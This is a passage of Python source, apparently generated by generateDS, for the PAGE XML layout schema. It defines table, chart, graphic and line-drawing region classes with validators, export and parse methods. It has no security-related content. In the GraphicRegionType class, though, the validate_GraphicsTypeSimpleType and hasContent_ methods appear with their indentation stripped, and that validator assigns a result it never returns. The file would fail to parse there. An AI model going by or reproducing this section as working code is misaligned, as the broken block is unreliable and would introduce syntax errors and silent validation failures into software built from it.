        # True otherwise (validation is skipped when no collector is set).
        if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
            if not isinstance(value, str):
                lineno = self.gds_get_node_lineno_()
                self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (str)' % {"value": value, "lineno": lineno, })
                return False
            enumerations = ['black', 'blue', 'brown', 'cyan', 'green', 'grey', 'indigo', 'magenta', 'orange', 'pink', 'red', 'turquoise', 'violet', 'white', 'yellow', 'other']
            if value not in enumerations:
                lineno = self.gds_get_node_lineno_()
                self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd enumeration restriction on ColourSimpleType' % {"value" : encode_str_2_3(value), "lineno": lineno} )
                # Bug fix: "result = False" was assigned but never returned.
                return False
        return True
    def hasContent_(self):
        # No child elements of its own; content presence is decided entirely
        # by the RegionType superclass.
        if (
            super(ChartRegionType, self).hasContent_()
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='ChartRegionType', pretty_print=True):
        # Serialise this element (start tag, attributes, children, end tag)
        # to *outfile* at the given indentation *level*.
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('ChartRegionType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None and name_ == 'ChartRegionType':
            # Preserve the tag name the element was originally parsed under.
            name_ = self.original_tagname_
        if UseCapturedNS_ and self.ns_prefix_:
            namespaceprefix_ = self.ns_prefix_ + ':'
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='ChartRegionType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='ChartRegionType', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='ChartRegionType'):
        # Superclass attributes first, then this type's own attributes.
        super(ChartRegionType, self).exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='ChartRegionType')
        if self.orientation is not None and 'orientation' not in already_processed:
            already_processed.add('orientation')
            outfile.write(' orientation="%s"' % self.gds_format_float(self.orientation, input_name='orientation'))
        if self.type_ is not None and 'type_' not in already_processed:
            already_processed.add('type_')
            outfile.write(' type=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.type_), input_name='type')), ))
        if self.numColours is not None and 'numColours' not in already_processed:
            already_processed.add('numColours')
            outfile.write(' numColours="%s"' % self.gds_format_integer(self.numColours, input_name='numColours'))
        if self.bgColour is not None and 'bgColour' not in already_processed:
            already_processed.add('bgColour')
            outfile.write(' bgColour=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.bgColour), input_name='bgColour')), ))
        if self.embText is not None and 'embText' not in already_processed:
            already_processed.add('embText')
            outfile.write(' embText="%s"' % self.gds_format_boolean(self.embText, input_name='embText'))
    def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='ChartRegionType', fromsubclass_=False, pretty_print=True):
        # No children of its own; delegate to the superclass.
        super(ChartRegionType, self).exportChildren(outfile, level, namespaceprefix_, namespacedef_, name_, True, pretty_print=pretty_print)
    def build(self, node, gds_collector_=None):
        # Populate this object from an element-tree *node*; returns self.
        self.gds_collector_ = gds_collector_
        if SaveElementTreeNode:
            self.gds_elementtree_node_ = node
        already_processed = set()
        self.ns_prefix_ = node.prefix
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        # Parse this type's own attributes, then the shared region attributes.
        value = find_attr_value_('orientation', node)
        if value is not None and 'orientation' not in already_processed:
            already_processed.add('orientation')
            value = self.gds_parse_float(value, node, 'orientation')
            self.orientation = value
        value = find_attr_value_('type', node)
        if value is not None and 'type' not in already_processed:
            already_processed.add('type')
            self.type_ = value
            self.validate_ChartTypeSimpleType(self.type_) # validate type ChartTypeSimpleType
        value = find_attr_value_('numColours', node)
        if value is not None and 'numColours' not in already_processed:
            already_processed.add('numColours')
            self.numColours = self.gds_parse_integer(value, node, 'numColours')
        value = find_attr_value_('bgColour', node)
        if value is not None and 'bgColour' not in already_processed:
            already_processed.add('bgColour')
            self.bgColour = value
            self.validate_ColourSimpleType(self.bgColour) # validate type ColourSimpleType
        value = find_attr_value_('embText', node)
        if value is not None and 'embText' not in already_processed:
            already_processed.add('embText')
            if value in ('true', '1'):
                self.embText = True
            elif value in ('false', '0'):
                self.embText = False
            else:
                raise_parse_error(node, 'Bad boolean attribute')
        super(ChartRegionType, self).buildAttributes(node, attrs, already_processed)
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
        # No children of its own; delegate to the superclass.
        super(ChartRegionType, self).buildChildren(child_, node, nodeName_, True)
        pass
# end class ChartRegionType
class TableRegionType(RegionType):
    """Tabular data in any form is represented with a table
    region. Rows and columns may or may not have separator
    lines; these lines are not separator regions.
    The angle the rectangle encapsulating a region
    has to be rotated in clockwise direction
    in order to correct the present skew
    (negative values indicate anti-clockwise rotation).
    Range: -179.999,180
    The number of rows present in the table
    The number of columns present in the table
    The colour of the lines used in the region
    The background colour of the region
    Specifies the presence of line separators
    Specifies whether the region also contains
    text"""
    __hash__ = GeneratedsSuper.__hash__
    # Introspection metadata for this type's XML attributes and its single
    # optional Grid child element, consumed by the generateDS runtime.
    member_data_items_ = [
        MemberSpec_('orientation', 'float', 0, 1, {'use': 'optional'}),
        MemberSpec_('rows', 'int', 0, 1, {'use': 'optional'}),
        MemberSpec_('columns', 'int', 0, 1, {'use': 'optional'}),
        MemberSpec_('lineColour', 'pc:ColourSimpleType', 0, 1, {'use': 'optional'}),
        MemberSpec_('bgColour', 'pc:ColourSimpleType', 0, 1, {'use': 'optional'}),
        MemberSpec_('lineSeparators', 'boolean', 0, 1, {'use': 'optional'}),
        MemberSpec_('embText', 'boolean', 0, 1, {'use': 'optional'}),
        MemberSpec_('Grid', 'GridType', 0, 1, {'maxOccurs': '1', 'minOccurs': '0', 'name': 'Grid', 'type': 'GridType'}, None),
    ]
    subclass = None
    superclass = RegionType
    def __init__(self, id=None, custom=None, comments=None, continuation=None, AlternativeImage=None, Coords=None, UserDefined=None, Labels=None, Roles=None, TextRegion=None, ImageRegion=None, LineDrawingRegion=None, GraphicRegion=None, TableRegion=None, ChartRegion=None, SeparatorRegion=None, MathsRegion=None, ChemRegion=None, MusicRegion=None, AdvertRegion=None, NoiseRegion=None, UnknownRegion=None, CustomRegion=None, orientation=None, rows=None, columns=None, lineColour=None, bgColour=None, lineSeparators=None, embText=None, Grid=None, gds_collector_=None, **kwargs_):
        self.gds_collector_ = gds_collector_
        self.gds_elementtree_node_ = None
        self.original_tagname_ = None
        self.parent_object_ = kwargs_.get('parent_object_')
        self.ns_prefix_ = "pc"
        super(globals().get("TableRegionType"), self).__init__(id, custom, comments, continuation, AlternativeImage, Coords, UserDefined, Labels, Roles, TextRegion, ImageRegion, LineDrawingRegion, GraphicRegion, TableRegion, ChartRegion, SeparatorRegion, MathsRegion, ChemRegion, MusicRegion, AdvertRegion, NoiseRegion, UnknownRegion, CustomRegion, **kwargs_)
        self.orientation = _cast(float, orientation)
        self.orientation_nsprefix_ = None
        self.rows = _cast(int, rows)
        self.rows_nsprefix_ = None
        self.columns = _cast(int, columns)
        self.columns_nsprefix_ = None
        self.lineColour = _cast(None, lineColour)
        self.lineColour_nsprefix_ = None
        self.bgColour = _cast(None, bgColour)
        self.bgColour_nsprefix_ = None
        self.lineSeparators = _cast(bool, lineSeparators)
        self.lineSeparators_nsprefix_ = None
        self.embText = _cast(bool, embText)
        self.embText_nsprefix_ = None
        self.Grid = Grid
        self.Grid_nsprefix_ = "pc"
    def factory(*args_, **kwargs_):
        # Prefer an application-registered subclass (via the subclass module
        # or the class-level ``subclass`` hook) over the generated type.
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, TableRegionType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if TableRegionType.subclass:
            return TableRegionType.subclass(*args_, **kwargs_)
        else:
            return TableRegionType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_ns_prefix_(self):
        return self.ns_prefix_
    def set_ns_prefix_(self, ns_prefix):
        self.ns_prefix_ = ns_prefix
    def get_Grid(self):
        return self.Grid
    def set_Grid(self, Grid):
        self.Grid = Grid
    def get_orientation(self):
        return self.orientation
    def set_orientation(self, orientation):
        self.orientation = orientation
    def get_rows(self):
        return self.rows
    def set_rows(self, rows):
        self.rows = rows
    def get_columns(self):
        return self.columns
    def set_columns(self, columns):
        self.columns = columns
    def get_lineColour(self):
        return self.lineColour
    def set_lineColour(self, lineColour):
        self.lineColour = lineColour
    def get_bgColour(self):
        return self.bgColour
    def set_bgColour(self, bgColour):
        self.bgColour = bgColour
    def get_lineSeparators(self):
        return self.lineSeparators
    def set_lineSeparators(self, lineSeparators):
        self.lineSeparators = lineSeparators
    def get_embText(self):
        return self.embText
    def set_embText(self, embText):
        self.embText = embText
    def validate_ColourSimpleType(self, value):
        # Validate type pc:ColourSimpleType, a restriction on string.
        # Returns False when a violation was recorded with the collector,
        # True otherwise (validation is skipped when no collector is set).
        if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
            if not isinstance(value, str):
                lineno = self.gds_get_node_lineno_()
                self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (str)' % {"value": value, "lineno": lineno, })
                return False
            enumerations = ['black', 'blue', 'brown', 'cyan', 'green', 'grey', 'indigo', 'magenta', 'orange', 'pink', 'red', 'turquoise', 'violet', 'white', 'yellow', 'other']
            if value not in enumerations:
                lineno = self.gds_get_node_lineno_()
                self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd enumeration restriction on ColourSimpleType' % {"value" : encode_str_2_3(value), "lineno": lineno} )
                # Bug fix: the generated code assigned "result = False" here
                # but never returned it, so enumeration failures fell through
                # and returned None instead of False.
                return False
        return True
    def hasContent_(self):
        # Content exists if the optional Grid child is present or the
        # RegionType superclass reports content of its own.
        if (
            self.Grid is not None or
            super(TableRegionType, self).hasContent_()
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='TableRegionType', pretty_print=True):
        # Serialise this element (start tag, attributes, children, end tag)
        # to *outfile* at the given indentation *level*.
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('TableRegionType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None and name_ == 'TableRegionType':
            # Preserve the tag name the element was originally parsed under.
            name_ = self.original_tagname_
        if UseCapturedNS_ and self.ns_prefix_:
            namespaceprefix_ = self.ns_prefix_ + ':'
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='TableRegionType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='TableRegionType', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='TableRegionType'):
        # Superclass attributes first, then this type's own attributes.
        super(TableRegionType, self).exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='TableRegionType')
        if self.orientation is not None and 'orientation' not in already_processed:
            already_processed.add('orientation')
            outfile.write(' orientation="%s"' % self.gds_format_float(self.orientation, input_name='orientation'))
        if self.rows is not None and 'rows' not in already_processed:
            already_processed.add('rows')
            outfile.write(' rows="%s"' % self.gds_format_integer(self.rows, input_name='rows'))
        if self.columns is not None and 'columns' not in already_processed:
            already_processed.add('columns')
            outfile.write(' columns="%s"' % self.gds_format_integer(self.columns, input_name='columns'))
        if self.lineColour is not None and 'lineColour' not in already_processed:
            already_processed.add('lineColour')
            outfile.write(' lineColour=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.lineColour), input_name='lineColour')), ))
        if self.bgColour is not None and 'bgColour' not in already_processed:
            already_processed.add('bgColour')
            outfile.write(' bgColour=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.bgColour), input_name='bgColour')), ))
        if self.lineSeparators is not None and 'lineSeparators' not in already_processed:
            already_processed.add('lineSeparators')
            outfile.write(' lineSeparators="%s"' % self.gds_format_boolean(self.lineSeparators, input_name='lineSeparators'))
        if self.embText is not None and 'embText' not in already_processed:
            already_processed.add('embText')
            outfile.write(' embText="%s"' % self.gds_format_boolean(self.embText, input_name='embText'))
    def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='TableRegionType', fromsubclass_=False, pretty_print=True):
        # Superclass children first, then the optional Grid child.
        super(TableRegionType, self).exportChildren(outfile, level, namespaceprefix_, namespacedef_, name_, True, pretty_print=pretty_print)
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.Grid is not None:
            namespaceprefix_ = self.Grid_nsprefix_ + ':' if (UseCapturedNS_ and self.Grid_nsprefix_) else ''
            self.Grid.export(outfile, level, namespaceprefix_, namespacedef_='', name_='Grid', pretty_print=pretty_print)
    def build(self, node, gds_collector_=None):
        # Populate this object from an element-tree *node*; returns self.
        self.gds_collector_ = gds_collector_
        if SaveElementTreeNode:
            self.gds_elementtree_node_ = node
        already_processed = set()
        self.ns_prefix_ = node.prefix
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        # Parse this type's own attributes, then the shared region attributes.
        value = find_attr_value_('orientation', node)
        if value is not None and 'orientation' not in already_processed:
            already_processed.add('orientation')
            value = self.gds_parse_float(value, node, 'orientation')
            self.orientation = value
        value = find_attr_value_('rows', node)
        if value is not None and 'rows' not in already_processed:
            already_processed.add('rows')
            self.rows = self.gds_parse_integer(value, node, 'rows')
        value = find_attr_value_('columns', node)
        if value is not None and 'columns' not in already_processed:
            already_processed.add('columns')
            self.columns = self.gds_parse_integer(value, node, 'columns')
        value = find_attr_value_('lineColour', node)
        if value is not None and 'lineColour' not in already_processed:
            already_processed.add('lineColour')
            self.lineColour = value
            self.validate_ColourSimpleType(self.lineColour) # validate type ColourSimpleType
        value = find_attr_value_('bgColour', node)
        if value is not None and 'bgColour' not in already_processed:
            already_processed.add('bgColour')
            self.bgColour = value
            self.validate_ColourSimpleType(self.bgColour) # validate type ColourSimpleType
        value = find_attr_value_('lineSeparators', node)
        if value is not None and 'lineSeparators' not in already_processed:
            already_processed.add('lineSeparators')
            if value in ('true', '1'):
                self.lineSeparators = True
            elif value in ('false', '0'):
                self.lineSeparators = False
            else:
                raise_parse_error(node, 'Bad boolean attribute')
        value = find_attr_value_('embText', node)
        if value is not None and 'embText' not in already_processed:
            already_processed.add('embText')
            if value in ('true', '1'):
                self.embText = True
            elif value in ('false', '0'):
                self.embText = False
            else:
                raise_parse_error(node, 'Bad boolean attribute')
        super(TableRegionType, self).buildAttributes(node, attrs, already_processed)
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
        # Build the optional Grid child; everything else goes to the
        # RegionType superclass.
        if nodeName_ == 'Grid':
            obj_ = GridType.factory(parent_object_=self)
            obj_.build(child_, gds_collector_=gds_collector_)
            self.Grid = obj_
            obj_.original_tagname_ = 'Grid'
        super(TableRegionType, self).buildChildren(child_, node, nodeName_, True)
# end class TableRegionType
class GraphicRegionType(RegionType):
    """Regions containing simple graphics, such as a company
    logo, should be marked as graphic regions.
    The angle the rectangle encapsulating a region
    has to be rotated in clockwise direction
    in order to correct the present skew
    (negative values indicate anti-clockwise rotation).
    Range: -179.999,180
    The type of graphic in the region
    An approximation of the number of colours
    used in the region
    Specifies whether the region also contains
    text."""
    __hash__ = GeneratedsSuper.__hash__
    # Introspection metadata for this type's XML attributes, consumed by the
    # generateDS runtime helpers.
    member_data_items_ = [
        MemberSpec_('orientation', 'float', 0, 1, {'use': 'optional'}),
        MemberSpec_('type_', 'pc:GraphicsTypeSimpleType', 0, 1, {'use': 'optional'}),
        MemberSpec_('numColours', 'int', 0, 1, {'use': 'optional'}),
        MemberSpec_('embText', 'boolean', 0, 1, {'use': 'optional'}),
    ]
    subclass = None
    superclass = RegionType
    def __init__(self, id=None, custom=None, comments=None, continuation=None, AlternativeImage=None, Coords=None, UserDefined=None, Labels=None, Roles=None, TextRegion=None, ImageRegion=None, LineDrawingRegion=None, GraphicRegion=None, TableRegion=None, ChartRegion=None, SeparatorRegion=None, MathsRegion=None, ChemRegion=None, MusicRegion=None, AdvertRegion=None, NoiseRegion=None, UnknownRegion=None, CustomRegion=None, orientation=None, type_=None, numColours=None, embText=None, gds_collector_=None, **kwargs_):
        # gds_collector_ accumulates parse/validation messages; the long
        # positional interface mirrors the generated RegionType signature.
        self.gds_collector_ = gds_collector_
        self.gds_elementtree_node_ = None
        self.original_tagname_ = None
        self.parent_object_ = kwargs_.get('parent_object_')
        self.ns_prefix_ = "pc"
        super(globals().get("GraphicRegionType"), self).__init__(id, custom, comments, continuation, AlternativeImage, Coords, UserDefined, Labels, Roles, TextRegion, ImageRegion, LineDrawingRegion, GraphicRegion, TableRegion, ChartRegion, SeparatorRegion, MathsRegion, ChemRegion, MusicRegion, AdvertRegion, NoiseRegion, UnknownRegion, CustomRegion, **kwargs_)
        # This type's own optional XML attributes; _cast coerces non-None
        # values to the target type.
        self.orientation = _cast(float, orientation)
        self.orientation_nsprefix_ = None
        self.type_ = _cast(None, type_)
        self.type__nsprefix_ = None
        self.numColours = _cast(int, numColours)
        self.numColours_nsprefix_ = None
        self.embText = _cast(bool, embText)
        self.embText_nsprefix_ = None
    def factory(*args_, **kwargs_):
        # Prefer an application-registered subclass (via the subclass module
        # or the class-level ``subclass`` hook) over the generated type.
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, GraphicRegionType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if GraphicRegionType.subclass:
            return GraphicRegionType.subclass(*args_, **kwargs_)
        else:
            return GraphicRegionType(*args_, **kwargs_)
    factory = staticmethod(factory)
    # Generated getter/setter pairs for this region type's attributes;
    # the underlying instance attributes may also be accessed directly.
    def get_ns_prefix_(self):
        return self.ns_prefix_
    def set_ns_prefix_(self, ns_prefix):
        self.ns_prefix_ = ns_prefix
    def get_orientation(self):
        return self.orientation
    def set_orientation(self, orientation):
        self.orientation = orientation
    def get_type(self):
        return self.type_
    def set_type(self, type_):
        self.type_ = type_
    def get_numColours(self):
        return self.numColours
    def set_numColours(self, numColours):
        self.numColours = numColours
    def get_embText(self):
        return self.embText
    def set_embText(self, embText):
        self.embText = embText
def validate_GraphicsTypeSimpleType(self, value):
# Validate type pc:GraphicsTypeSimpleType, a restriction on string.
if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
if not isinstance(value, str):
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (str)' % {"value": value, "lineno": lineno, })
return False
value = value
enumerations = ['logo', 'letterhead', 'decoration', 'frame', 'handwritten-annotation', 'stamp', 'signature', 'barcode', 'paper-grow', 'punch-hole', 'other']
if value not in enumerations:
lineno = self.gds_get_node_lineno_()
self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd enumeration restriction on GraphicsTypeSimpleType' % {"value" : encode_str_2_3(value), "lineno": lineno} )
result = False
def hasContent_(self):
if (
super(GraphicRegionType, self).hasContent_()
):
return True
else:
return False
    def export(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='GraphicRegionType', pretty_print=True):
        """Serialize this element (tag, attributes, children) as XML to *outfile*."""
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('GraphicRegionType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        # Prefer the tag name the element was originally parsed with.
        if self.original_tagname_ is not None and name_ == 'GraphicRegionType':
            name_ = self.original_tagname_
        if UseCapturedNS_ and self.ns_prefix_:
            namespaceprefix_ = self.ns_prefix_ + ':'
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='GraphicRegionType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='GraphicRegionType', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            # No children: emit a self-closing tag.
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='GraphicRegionType'):
        """Write this element's XML attributes, after the superclass's own."""
        super(GraphicRegionType, self).exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='GraphicRegionType')
        if self.orientation is not None and 'orientation' not in already_processed:
            already_processed.add('orientation')
            outfile.write(' orientation="%s"' % self.gds_format_float(self.orientation, input_name='orientation'))
        if self.type_ is not None and 'type_' not in already_processed:
            already_processed.add('type_')
            outfile.write(' type=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.type_), input_name='type')), ))
        if self.numColours is not None and 'numColours' not in already_processed:
            already_processed.add('numColours')
            outfile.write(' numColours="%s"' % self.gds_format_integer(self.numColours, input_name='numColours'))
        if self.embText is not None and 'embText' not in already_processed:
            already_processed.add('embText')
            outfile.write(' embText="%s"' % self.gds_format_boolean(self.embText, input_name='embText'))
    def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='GraphicRegionType', fromsubclass_=False, pretty_print=True):
        # GraphicRegionType adds no children of its own; delegate to RegionType.
        super(GraphicRegionType, self).exportChildren(outfile, level, namespaceprefix_, namespacedef_, name_, True, pretty_print=pretty_print)
    def build(self, node, gds_collector_=None):
        """Populate this instance from an ElementTree/lxml *node* and return self."""
        self.gds_collector_ = gds_collector_
        if SaveElementTreeNode:
            self.gds_elementtree_node_ = node
        already_processed = set()
        self.ns_prefix_ = node.prefix
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        """Read this element's XML attributes from *node*, then delegate to the superclass."""
        value = find_attr_value_('orientation', node)
        if value is not None and 'orientation' not in already_processed:
            already_processed.add('orientation')
            value = self.gds_parse_float(value, node, 'orientation')
            self.orientation = value
        value = find_attr_value_('type', node)
        if value is not None and 'type' not in already_processed:
            already_processed.add('type')
            self.type_ = value
            self.validate_GraphicsTypeSimpleType(self.type_) # validate type GraphicsTypeSimpleType
        value = find_attr_value_('numColours', node)
        if value is not None and 'numColours' not in already_processed:
            already_processed.add('numColours')
            self.numColours = self.gds_parse_integer(value, node, 'numColours')
        value = find_attr_value_('embText', node)
        if value is not None and 'embText' not in already_processed:
            already_processed.add('embText')
            if value in ('true', '1'):
                self.embText = True
            elif value in ('false', '0'):
                self.embText = False
            else:
                raise_parse_error(node, 'Bad boolean attribute')
        super(GraphicRegionType, self).buildAttributes(node, attrs, already_processed)
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
        # GraphicRegionType defines no extra children; RegionType handles them all.
        super(GraphicRegionType, self).buildChildren(child_, node, nodeName_, True)
        pass
# end class GraphicRegionType
class LineDrawingRegionType(RegionType):
    """Region subtype for line drawings: single-colour illustrations
    without solid areas.

    XML attributes (all optional):
      orientation -- clockwise rotation angle (degrees, range -179.999..180)
                     needed to correct the region's skew; negative values
                     indicate anti-clockwise rotation.
      penColour   -- pen (foreground) colour (pc:ColourSimpleType).
      bgColour    -- background colour (pc:ColourSimpleType).
      embText     -- whether the region also contains text.
    """
    __hash__ = GeneratedsSuper.__hash__
    # Generated member specifications used by the marshalling machinery.
    member_data_items_ = [
        MemberSpec_('orientation', 'float', 0, 1, {'use': 'optional'}),
        MemberSpec_('penColour', 'pc:ColourSimpleType', 0, 1, {'use': 'optional'}),
        MemberSpec_('bgColour', 'pc:ColourSimpleType', 0, 1, {'use': 'optional'}),
        MemberSpec_('embText', 'boolean', 0, 1, {'use': 'optional'}),
    ]
    subclass = None
    superclass = RegionType
    def __init__(self, id=None, custom=None, comments=None, continuation=None, AlternativeImage=None, Coords=None, UserDefined=None, Labels=None, Roles=None, TextRegion=None, ImageRegion=None, LineDrawingRegion=None, GraphicRegion=None, TableRegion=None, ChartRegion=None, SeparatorRegion=None, MathsRegion=None, ChemRegion=None, MusicRegion=None, AdvertRegion=None, NoiseRegion=None, UnknownRegion=None, CustomRegion=None, orientation=None, penColour=None, bgColour=None, embText=None, gds_collector_=None, **kwargs_):
        self.gds_collector_ = gds_collector_
        self.gds_elementtree_node_ = None
        self.original_tagname_ = None
        self.parent_object_ = kwargs_.get('parent_object_')
        self.ns_prefix_ = "pc"
        super(globals().get("LineDrawingRegionType"), self).__init__(id, custom, comments, continuation, AlternativeImage, Coords, UserDefined, Labels, Roles, TextRegion, ImageRegion, LineDrawingRegion, GraphicRegion, TableRegion, ChartRegion, SeparatorRegion, MathsRegion, ChemRegion, MusicRegion, AdvertRegion, NoiseRegion, UnknownRegion, CustomRegion, **kwargs_)
        self.orientation = _cast(float, orientation)
        self.orientation_nsprefix_ = None
        self.penColour = _cast(None, penColour)
        self.penColour_nsprefix_ = None
        self.bgColour = _cast(None, bgColour)
        self.bgColour_nsprefix_ = None
        self.embText = _cast(bool, embText)
        self.embText_nsprefix_ = None
    def factory(*args_, **kwargs_):
        """Create a LineDrawingRegionType instance (or a registered subclass)."""
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, LineDrawingRegionType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if LineDrawingRegionType.subclass:
            return LineDrawingRegionType.subclass(*args_, **kwargs_)
        else:
            return LineDrawingRegionType(*args_, **kwargs_)
    factory = staticmethod(factory)
    # --- Generated accessors ---
    def get_ns_prefix_(self):
        return self.ns_prefix_
    def set_ns_prefix_(self, ns_prefix):
        self.ns_prefix_ = ns_prefix
    def get_orientation(self):
        return self.orientation
    def set_orientation(self, orientation):
        self.orientation = orientation
    def get_penColour(self):
        return self.penColour
    def set_penColour(self, penColour):
        self.penColour = penColour
    def get_bgColour(self):
        return self.bgColour
    def set_bgColour(self, bgColour):
        self.bgColour = bgColour
    def get_embText(self):
        return self.embText
    def set_embText(self, embText):
        self.embText = embText
    def validate_ColourSimpleType(self, value):
        """Validate *value* against pc:ColourSimpleType (xsd string enumeration).

        Violations are reported to self.gds_collector_. Returns True when the
        value is valid (or validation is disabled), False otherwise.
        """
        # Fix: the generated code assigned ``result = False`` without ever
        # returning it; now a boolean is returned on every path.
        result = True
        if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
            if not isinstance(value, str):
                lineno = self.gds_get_node_lineno_()
                self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (str)' % {"value": value, "lineno": lineno, })
                return False
            enumerations = ['black', 'blue', 'brown', 'cyan', 'green', 'grey', 'indigo', 'magenta', 'orange', 'pink', 'red', 'turquoise', 'violet', 'white', 'yellow', 'other']
            if value not in enumerations:
                lineno = self.gds_get_node_lineno_()
                self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd enumeration restriction on ColourSimpleType' % {"value" : encode_str_2_3(value), "lineno": lineno} )
                result = False
        return result
    def hasContent_(self):
        """Return True when this element has child content to serialize."""
        if (
            super(LineDrawingRegionType, self).hasContent_()
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='LineDrawingRegionType', pretty_print=True):
        """Serialize this element (tag, attributes, children) as XML to *outfile*."""
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('LineDrawingRegionType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None and name_ == 'LineDrawingRegionType':
            name_ = self.original_tagname_
        if UseCapturedNS_ and self.ns_prefix_:
            namespaceprefix_ = self.ns_prefix_ + ':'
        showIndent(outfile, level, pretty_print)
